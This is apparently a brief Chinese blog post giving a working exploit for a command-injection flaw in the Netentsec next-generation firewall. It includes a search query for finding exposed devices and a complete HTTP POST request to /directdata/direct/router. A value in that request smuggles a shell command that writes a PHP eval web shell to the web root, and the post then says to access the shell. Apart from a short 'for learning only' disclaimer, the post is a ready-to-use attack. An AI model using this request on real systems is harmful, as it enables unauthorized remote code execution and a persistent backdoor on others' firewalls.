仅供交流与学习使用,请勿用于非法用途,否则后果自负
引用大佬文章
https://xz.aliyun.com/t/9495
寻找目标
app="网康科技-下一代防火墙"
抓包改包(Host和Referer)
POST /directdata/direct/router HTTP/1.1
Host: xx.xx.xx
Cookie: PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xx.xx.xx.xx/user/login/index/logined/fail
Dnt: 1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Connection: close
Content-Length: 221
{
"action": "SSLVPN_Resource",
"method": "deleteImage",
"data":[{
"data":["/var/www/html/b.txt;echo '<?php @eval($_POST[a]);?>'>/var/www/html/test.php"]
}],
"type": "rpc",
"tid": 17
}
1.jpg
访问shell
2.jpg
网友评论